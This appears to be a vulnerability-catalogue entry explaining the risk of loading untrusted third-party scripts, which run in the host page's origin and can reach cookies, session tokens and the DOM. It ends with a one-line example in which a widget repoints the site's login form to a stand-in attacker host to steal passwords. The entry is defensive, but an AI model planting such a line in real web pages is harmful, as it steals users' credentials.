This vulnerability occurs when a web application directly imports and executes functionality, like a widget or script, from an external, untrusted domain. Because the imported code runs within your application's own security context (origin), it gains the same level of access to user data and the DOM as your own code, potentially giving the third party full control.
Incorporating third-party web functionality, such as JavaScript widgets or analytics scripts, is a common practice but introduces significant risk. The core issue is that code loaded via tags like `<script src="http://untrusted-source.com">` executes with the same privileges as your own application. The external code can read sensitive data such as user cookies, session tokens, and the entire DOM; the browser's same-origin policy offers no protection here, because the script runs as part of your origin rather than a foreign one. Even if you trust the provider, your application remains vulnerable if that provider's infrastructure is compromised or if the code is altered during delivery (a supply-chain attack). Developers are not always aware of every external dependency their application loads, which makes this a subtle but widespread issue in modern web mashups and integrated services.
Impact: Execute Unauthorized Code or Commands
Example (HTML): a page embeds a third-party weather widget; the widget's code is elided except for one line that repoints the host site's own login form to an attacker-controlled endpoint:

    ...Weather widget code...
    // Runs in the host page's origin, so it can reach the host's own DOM:
    document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php";